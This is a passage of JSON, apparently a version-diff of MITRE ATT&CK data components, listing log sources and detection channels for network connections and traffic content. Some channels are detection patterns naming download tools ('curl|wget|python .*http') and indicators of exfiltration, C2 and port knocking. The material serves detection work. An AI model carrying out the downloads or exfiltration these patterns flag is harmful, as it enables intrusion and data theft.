                            "channel": "socket/bind: Process binds to a new local port shortly after knock"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "socket/connect calls showing SSH processes forwarding arbitrary ports"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "openat,connect -k discovery"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Outbound connection to 169.254.169.254 from EC2 workload"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Large transfer volume (>20MB) from RDS IP range to external public IPs"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "High outbound traffic from new region resource"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Outbound connections to port 22, 3389"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Traffic observed on mirror destination instance"
                        },
                        {
                            "name": "cni:netflow",
                            "channel": "outbound connection to internal or external APIs"
                        },
                        {
                            "name": "ebpf:syscalls",
                            "channel": "socket connect"
                        },
                        {
                            "name": "esxi:esxupdate",
                            "channel": "/var/log/esxupdate.log or /var/log/vmksummary.log"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "System service interactions"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Service initiated connections"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Service-Based Network Connection"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "protocol egress"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "network activity"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "None"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "network session initiation with external HTTPS services"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "family=AF_PACKET or protocol raw; process name not in allowlist."
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "network"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "postfix/smtpd"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "New Wi-Fi connection established or repeated association failures"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "None"
                        },
                        {
                            "name": "linux:Sysmon",
                            "channel": "EventCode=3, 22"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_CONNECT"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process_events/socket_events"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "execution of trusted tools interacting with external endpoints"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "launchd or network_events"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process_events + launchd"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process_events, socket_events"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "CONNECT: Long-lived connections from remote-control parents to external IPs/domains"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "None"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "connection attempts"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "connection open"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "network connection events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "First outbound connection from the same PID/user shortly after an inbound trigger."
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "network sessions initiated by remote desktop apps"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Inbound connections to VNC/SSH ports"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "network"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Outbound Traffic"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "None"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "networkd or socket"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream network activity"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Association and authentication events including failures and new SSIDs"
                        },
                        {
                            "name": "Network",
                            "channel": "None"
                        },
                        {
                            "name": "Network Traffic",
                            "channel": "None"
                        },
                        {
                            "name": "networkdevice:Flow",
                            "channel": "Traffic from mirrored interface to mirror target IP"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Dynamic route changes"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "web domain alerts"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "New outbound connection from Safari/Chrome/Firefox/Word"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Outbound connections from newly spawned child processes or from the browser to uncommon endpoints or on anomalous ports"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Outbound connection after script or installer launch"
                        },
                        {
                            "name": "NSM:Firewall",
                            "channel": "Outbound Connections"
                        },
                        {
                            "name": "NSM:Firewall",
                            "channel": "proxy or TLS inspection logs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "New TCP/443 or TCP/80 to domain not previously seen for the user/host"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound connection to *.tunnels.api.visualstudio.com or *.devtunnels.ms"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Connections to *.devtunnels.ms or tunnels.api.visualstudio.com"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTPs connection to tunnels.api.visualstudio.com"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound or inbound TFTP file transfers of ROMMON or firmware binaries"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "connection: TCP connections to ports 139/445 to multiple hosts"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "connection: SMB connections to multiple internal hosts"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound HTTP/S initiated by newly installed interpreter process"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "outbound connections to RMM services or to unusual destination ports"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Multiple failed connections (conn_state=REJ/S0 or history has 'R') across distinct ports from the same src_ip followed by success to a specific port."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Sequence of REJ/S0 then SF success from same src_ip within TimeWindow."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Series of denied/closed flows to distinct ports then success to mgmt port from same src_ip within TimeWindow."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound traffic spike through formerly blocked ports/subnets following config change"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "New egress to Internet by the same UID/host shortly after terminal exec"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "connection: Inbound connections to SSH or VPN ports"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "External access to container ports (2375, 6443)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "remote access"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound Connections"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "connection attempts"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "High-volume or repeated SNMP GETBULK/GETNEXT queries from untrusted or external IPs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "outbound connections from host during or immediately after image build"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "new outbound connection from browser/office lineage"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "new outbound connection from exploited lineage"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Multiple failed connections to closed ports (history contains 'R' or conn_state in {REJ, S0}) followed by a successful handshake to a new port from same src within TimeWindowKnock"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Closed-port hits followed by success from same src_ip"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Port-knock pattern from one src to device unicast,broadcast,network addresses on same port within TimeWindowKnock"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Unexpected inbound/outbound TFTP traffic for device image files"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Unexpected or unauthorized inbound connections to SNMP, NETCONF, or RESTCONF services"
                        },
                        {
                            "name": "snmp:access",
                            "channel": "GETBULK/GETNEXT requests for OIDs associated with configuration parameters"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-Bits-Client/Operational",
                            "channel": "BITS job lifecycle events such as job create/modify/transfer/complete and URL/remote name fields"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-WLAN-AutoConfig",
                            "channel": "EventCode=8001, 8002, 8003"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=5156, 5157"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=3, 22"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "EventCode=8001"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack",
                        "mobile-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 18:37:33.992000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][0]\": {\"name\": \"NSM:Flow\", \"channel\": \"log entries indicating network connection initiation on macOS\"}, \"root['x_mitre_log_sources'][53]\": {\"name\": \"Network\", \"channel\": \"None\"}, \"root['x_mitre_log_sources'][60]\": {\"name\": \"NSM:Connections\", \"channel\": \"Outbound connection after script or installer launch\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.274000+00:00",
                    "modified": "2026-04-22 14:48:50.367000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0085",
                            "external_id": "DC0085"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Network Traffic Content",
                    "description": "The full packet capture (PCAP) or session data that logs both protocol headers and payload content. This allows analysts to inspect command and control (C2) traffic, exfiltration, and other suspicious activity within network communications. Unlike metadata-based logs, full content analysis enables deeper protocol inspection, payload decoding, and forensic investigations.\n\n*Data Collection Measures:*\n\n- Network Packet Capture (Full Content Logging)\n    - Wireshark / tcpdump / tshark\n        - Full packet captures (PCAP files) for manual analysis or IDS correlation. `tcpdump -i eth0 -w capture.pcap`\n    - Zeek (formerly Bro)\n        - Extracts protocol headers and payload details into structured logs. `echo \"redef Log::default_store = Log::ASCII;\" > local.zeek | zeek -Cr capture.pcap local.zeek`\n    - Suricata / Snort (IDS/IPS with PCAP Logging)\n        - Deep packet inspection (DPI) with signature-based and behavioral analysis. `suricata -c /etc/suricata/suricata.yaml -i eth0 -l /var/log/suricata`\n- Host-Based Collection\n    - Sysmon Event ID 22 \u2013 DNS Query Logging, Captures DNS requests made by processes, useful for detecting C2 domains.\n    - Sysmon Event ID 3 \u2013 Network Connection Initiated, Logs process-to-network connection relationships.\n    - AuditD (Linux) \u2013 syscall=connect, Monitors outbound network requests from processes. `auditctl -a always,exit -F arch=b64 -S connect -k network_activity`\n- Cloud & SaaS Traffic Collection\n    - AWS VPC Flow Logs / Azure NSG Flow Logs / Google VPC Flow Logs, Captures metadata about inbound/outbound network traffic.\n    - Cloud IDS (AWS GuardDuty, Azure Sentinel, Google Chronicle), Detects malicious activity in cloud environments by analyzing network traffic patterns.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Traffic",
                            "channel": "None"
                        },
                        {
                            "name": "ALB:HTTPLogs",
                            "channel": "AWS ALB/ELB/GCP/Azure Application Gateway HTTP logs with unusual methods, long URIs, serialized payloads, 4xx/5xx bursts"
                        },
                        {
                            "name": "apache:access_log",
                            "channel": "Unusual HTTP POST or PUT requests to paths such as '/uploads/', '/admin/', or CMS plugin folders"
                        },
                        {
                            "name": "API:ConfigRepoAudit",
                            "channel": "Access to configuration repository endpoints, unusual enumeration requests or mass downloads"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "setsockopt, ioctl modifying ARP entries"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Traffic between instances"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Large volume of malformed or synthetic payloads to application endpoints prior to failure"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Unusual volume of data transferred from S3 storage endpoints to non-corporate IPs"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "High volume internal-to-internal IP transfer or cross-account cloud transfer"
                        },
                        {
                            "name": "azure:activity",
                            "channel": "networkInsightsLogs"
                        },
                        {
                            "name": "azure:vpcflow",
                            "channel": "HTTP requests to 169.254.169.254 or Azure Metadata endpoints"
                        },
                        {
                            "name": "container:proxy",
                            "channel": "outbound/inbound network activity from spawned pods"
                        },
                        {
                            "name": "docker:events",
                            "channel": "remote API calls to /containers/create or /containers/{id}/start"
                        },
                        {
                            "name": "docker:stats",
                            "channel": "unusual network TX/RX byte deltas"
                        },
                        {
                            "name": "ebpf:syscalls",
                            "channel": "Process within container accesses link-local address 169.254.169.254"
                        },
                        {
                            "name": "EDR:hunting",
                            "channel": "Advanced Hunting: DeviceProcessEvents + DeviceNetworkEvents"
                        },
                        {
                            "name": "esxcli:network",
                            "channel": "Socket sessions with randomized payloads inconsistent with TLS"
                        },
                        {
                            "name": "esxcli:network",
                            "channel": "listening sockets bound to non-standard ports"
                        },
                        {
                            "name": "esxcli:network",
                            "channel": "listening sockets bound with non-standard encapsulated protocols"
                        },
                        {
                            "name": "esxcli:network",
                            "channel": "Socket inspection showing RSA key exchange outside baseline endpoints"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Network activity"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Outbound traffic using encoded payloads post-login"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "HTTPS POST connections to webhook endpoints"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Inspection of sockets showing encrypted sessions from non-baseline processes"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "HTTPS POST connections to pastebin-like domains"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "network stack module logs"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Suspicious traffic filtered or redirected by VM networking stack"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "VMCI syslog entries"
                        },
                        {
                            "name": "esxi:vob",
                            "channel": "NFS/remote access logs"
                        },
                        {
                            "name": "etw:Microsoft-Windows-NDIS-PacketCapture",
                            "channel": "TLS Handshake/Network Flow"
                        },
                        {
                            "name": "etw:Microsoft-Windows-WinINet",
                            "channel": "HTTPS Inspection"
                        },
                        {
                            "name": "etw:Microsoft-Windows-WinINet",
                            "channel": "WinINet API telemetry"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "network.query*"
                        },
                        {
                            "name": "gcp:vpcflow",
                            "channel": "first 5m egress to unknown ASNs"
                        },
                        {
                            "name": "IDS:TLSInspection",
                            "channel": "Malformed certs, incomplete asymmetric handshakes, or invalid CAs"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Per-app VPN flow logging indicating opaque/archived payload transfer preceding local decode"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Per-App VPN flow with code-like content types (application/octet-stream, application/zip, text/javascript, application/x-mach-o)"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "WKWebView navigation to domain visually similar to target brand (IDN/punycode/alike score)"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Query to suspicious domain with high entropy or low reputation"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "curl|wget|python .*http"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Unexpected SQL or application log entries showing tampered or malformed data"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Integrity mismatch warnings or malformed packets detected"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "DNS response IPs followed by connections to non-standard calculated ports"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Multiple NXDOMAIN responses and high entropy domains"
                        },
                        {
                            "name": "m365:office",
                            "channel": "External HTTP/DNS connection from Office binary shortly after macro trigger"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process + network metrics correlation for bandwidth saturation"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "DNS query with pseudo-random subdomain patterns"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "network flow"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "curl|osascript.*open location"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem: com.apple.network"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "open URL|clicked link|LSQuarantineAttach"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "None"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Connections to suspicious domains with mismatched certificate or unusual patterns"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "HTTP POST with encoded content in user-agent or cookie field"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Suspicious outbound HTTPS requests to domains flagged as newly registered or untrusted after spearphishing message interaction"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream (subsystem: com.apple.system.networking)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Encrypted connection with anomalous payload entropy"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Rapid incoming TLS handshakes or HTTP requests in quick succession"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "network, socket, and http logs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "DNS responses followed by connections to ports outside standard ranges"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Persistent outbound traffic to mining domains"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Encrypted session initiation by unexpected binary"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "eventMessage = 'promiscuous'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "outbound HTTPS connections to code repository APIs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "eventMessage = 'open', 'sendto', 'connect'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "dns-sd, mDNSResponder, socket activity"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process + network activity"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem=com.apple.WebKit"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem: com.apple.WebKit or com.apple.WebKit.Networking"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "encrypted outbound traffic carrying unexpected application data"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Persistent outbound connections with consistent periodicity"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "TLS connections with abnormal handshake sequence or self-signed cert"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Web server process initiating outbound TCP connections not tied to normal server traffic"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "outbound TLS connections to cloud storage providers"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "outbound HTTPS connections to cloud storage APIs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process, network"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process = 'ssh' OR eventMessage CONTAINS 'ssh'"
                        },
                        {
                            "name": "Netfilter/iptables",
                            "channel": "Forwarded packets log"
                        },
                        {
                            "name": "Network Traffic",
                            "channel": "None"
                        },
                        {
                            "name": "networkconfig ",
                            "channel": "interface flag PROMISC, netstat | ip link | ethtool"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "NAT table modification (add/update/delete rule)"
                        },
                        {
                            "name": "networkdevice:IDS",
                            "channel": "content inspection / PCAP / HTTP body"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "ACL/Firewall rule modification or new route injection"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "config change (e.g., logging buffered, pcap buffers)"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Authentication failures, unexpected community string usage, or unauthorized SNMPv1/v2 requests"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Authentication failures or unusual community string usage in SNMP queries"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Symmetric encryption detected without TLS handshake sequence"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "TLS handshake + HTTP headers"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Abnormal certificate chains or non-standard ports carrying TLS"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Unusual POST requests to admin or upload endpoints"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Outbound connections to internal enterprise services exhibiting anomalous protocol behavior, malformed sessions, or exploit-consistent traffic patterns"
                        },
                        {
                            "name": "NSM:Content",
                            "channel": "SSL Certificate Metadata"
                        },
                        {
                            "name": "NSM:Content",
                            "channel": "HTTP Header Metadata"
                        },
                        {
                            "name": "NSM:Content",
                            "channel": "TLS Fingerprint and Certificate Analysis"
                        },
                        {
                            "name": "NSM:Content",
                            "channel": "Traffic on RPC DRSUAPI"
                        },
                        {
                            "name": "NSM:Firewall",
                            "channel": "TLS/HTTP inspection"
                        },
                        {
                            "name": "NSM:Firewall",
                            "channel": "High rate of inbound TCP SYN or ACK packets with missing 3-way handshake completion"
                        },
                        {
                            "name": "NSM:Firewall",
                            "channel": "Anomalous TCP SYN or ACK spikes from specific source or interface"
                        },
                        {
                            "name": "NSM:Firewall",
                            "channel": "Outbound encrypted traffic"
                        },
                        {
                            "name": "NSM:Firewall",
                            "channel": "ICMP/UDP protocol anomaly"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "mqtt.log / xmpp.log (custom log feeds)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "mqtt.log or AMQP custom log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "mqtt.log, xmpp.log, amqp.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "TCP/UDP"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "TCP session tracking"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Captured packet payloads"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "session behavior"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "External C2 channel over TLS"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http/file-xfer: Inbound/outbound transfer of ELF shared objects"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http.log, files.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "unexpected network activity initiated shortly after shell session starts"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP/WebDAV requests that contain NTLMSSP or PROPFIND/MOVE/OPTIONS with Authorization: NTLM"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http.log, ssl.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http.log, conn.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "SPAN or port-mirrored HTTP/S"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http.log, ssl.log, websocket.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ssl.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Browser connections to known C2 or dynamic DNS domains"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Session History Reset"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP "
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "query: High-volume LDAP traffic with filters targeting groupPolicyContainer attributes"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP/TLS Logs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Suspicious URL patterns, uncommon TLDs, short-lived domains, URL shorteners; HTTP method GET/POST"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Suspicious URL patterns, uncommon TLDs, URL shorteners"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Suspicious GET/POST; downloader patterns"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "SSH logins or scp activity"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "remote login and transfer"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Suspicious long-lived or reattached remote desktop sessions from unexpected IPs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP payloads with SQLi/LFI/JNDI/deserialization indicators"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "outbound egress from web host after suspicious request"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Requests towards cloud metadata or command & control from pod IPs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Connections to TCP 427 (SLP) or vCenter web services from untrusted sources"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "NetFlow/sFlow for odd egress to Internet from mgmt plane"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "packet capture or DPI logs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "SMB2_LOGOFF/SMB_TREE_DISCONNECT"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Unusual Base64-encoded content in URI, headers, or POST body"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Base64 strings or gzip in URI, headers, or POST body"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Inbound connections to 445, 3389, 5985-5986 with high error/connection-reset rate, followed by new outbound sessions from the same host to internal assets within short interval."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Inbound connections to monitored service ports from external or unusual internal sources; rapid follow-on lateral connections from the same host."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Inbound to tcp/427 (OpenSLP), tcp/443 (vSphere APIs), tcp/902, tcp/5989 followed by new unexpected outbound sessions from the ESXi/vCenter host."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Inbound to 22/5900/8080 and follow-on internal connections."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http: HTTP body or headers contain long Base64 sections; gzip/deflate + Base64"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http: HTTP body contains long Base64 sections"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http: Base64/MIME looking payloads from ESXi host IP"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "LDAP Bind/Search"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "LDAP Query"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "smtp.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "smtp.log, conn.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "remote CLI session detection"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http.log, ftp.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "PCAP inspection"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "large HTTPS POST requests to webhook endpoints"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Single, low-volume inbound packet (REJ/S0/OTH or uncommon dport/protocol) from src_ip followed by outbound SF connection to src_ip."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Rare inbound packet characteristics (ICMP/UDP/TCP to uncommon port) from src_ip followed \u2264TimeWindow by outbound SF from same host to src_ip."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Inbound one-off packet to uncommon port \u2192 outbound SF to same src_ip within TimeWindow."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "large upload to firmware interface port or path"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http.request: HTTP requests and responses for specific script resources, unexpected content-types (application/octet-stream for script URLs), suspicious referrers, or obfuscated javascript resources"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http::response: HTTP responses with suspicious content-type for scripts, long obfuscated javascript bodies, or redirects to exploit kit domains"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP/HTTPS requests for script resources flagged by content inspection (excessive obfuscation, eval usage, unusual redirects)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ssl.log + http.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http/file-xfer: Outbound transfer of large video-like MIME types soon after capture"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound SCP, TFTP, or FTP sessions carrying configuration file content"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Session Transfer Content"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Captured File Content"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "C2 exfiltration"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Transferred file observations"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http::post: Outbound HTTP POST from host shortly after DB export activity"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTPS API requests to Dropbox, iCloud, Google Drive, OneDrive shortly after DB tool usage"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Observed downgrade in negotiated cipher suites or TLS/SSH versions across sessions"
                        },
                        {
